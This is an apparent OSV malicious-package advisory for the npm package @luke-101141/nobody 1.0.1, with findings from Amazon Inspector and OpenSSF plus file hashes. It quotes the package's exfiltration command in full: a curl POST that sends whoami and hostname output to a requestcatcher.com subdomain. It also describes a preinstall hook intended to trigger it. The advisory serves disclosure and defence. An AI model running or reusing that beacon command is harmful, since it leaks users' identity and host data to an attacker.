MAL-2026-4229

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@luke-101141/nobody/MAL-2026-4229.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4229

Published

2026-05-21T13:18:52Z

Modified

2026-05-27T23:16:43.048173591Z

Summary

Malicious code in @luke-101141/nobody (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8)

On require(), index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$(whoami)/$(hostname)/", leaking the installing user's identity and machine hostname over plaintext HTTP to an anonymous request-inspection service (requestcatcher.com) commonly used as a throwaway exfil sink. The package has no advertised functionality — empty description, no useful exports — its sole effect is the identity beacon. package.json also contains a top-level "preinstall": "node index.js" field outside the scripts block; as written it does not fire at install time, but the intent to trigger the same payload at npm install is explicit. Any consumer importing this package leaks host/user identity to the attacker.

Source: ossf-package-analysis (cd4cb72508248900987f8bd099896c95e232fee57835b5a89ac6b0d3178c2ed7)

The OpenSSF Package Analysis project identified '@luke-101141/nobody' @ 1.0.1 (npm) as malicious.

It is considered malicious because:

The package executes one or more commands associated with malicious behavior.

Database specific

{
    "malicious-packages-origins": [
        {
            "source": "ossf-package-analysis",
            "import_time": "2026-05-21T22:53:48.245127954Z",
            "modified_time": "2026-05-21T13:31:26Z",
            "versions": [
                "1.0.1"
            ],
            "sha256": "cd4cb72508248900987f8bd099896c95e232fee57835b5a89ac6b0d3178c2ed7"
        },
        {
            "import_time": "2026-05-26T05:51:22.838518518Z",
            "source": "amazon-inspector",
            "sha256": "8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8",
            "id": "IN-MAL-2026-003819",
            "versions": [
                "1.0.1"
            ],
            "modified_time": "2026-05-21T13:18:52Z"
        }
    ]
}

References

https://www.npmjs.com/package/@luke-101141/nobody/v/1.0.1

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com
- OpenSSF: Package Analysis - FINDER
- - https://github.com/ossf/package-analysis
  - https://openssf.slack.com/channels/package_analysis

Affected packages

npm / @luke-101141/nobody

Package

Name: @luke-101141/nobody; View open source insights on deps.dev
Purl: pkg:npm/%40luke-101141%2Fnobody

Affected ranges

Affected versions

1.*

1.0.1

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@luke-101141/nobody/MAL-2026-4229.json"

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

indicators

{
    "package_integrity": [
        {
            "filename": "nobody-1.0.1.tgz",
            "hashes": {
                "sha1": "5a0cbf29659f7fece79c521746a19f0faa7c4376",
                "sha512_sri": "sha512-D27Eh35JzuckGv3gBLQqbpXixCDeRLfohET6SPUqcm4i7zVYwPhArUa07lKgDihfnaBEOAfmz3CzgPPFLthWsg=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "0be07d0e1cf88d3a723354a5f948581ba68bdb101237f0d2a89e1509038998448182cb",
            "path": "index.js",
            "sha256": "49be609680fa7f470d893f23ea379e7336ae84fc14521dd9f14df859646ce1c3"
        },
        {
            "tlsh": "09d05e380d61953326c40a66096ba45766a18f2f00287c0897db583890debb7a8ff36d",
            "path": "package.json",
            "sha256": "5289d5e4b19c6d1ec270927d4147db913fe9dc77c05fd09b25bfbf9356ad7be2"
        }
    ]
}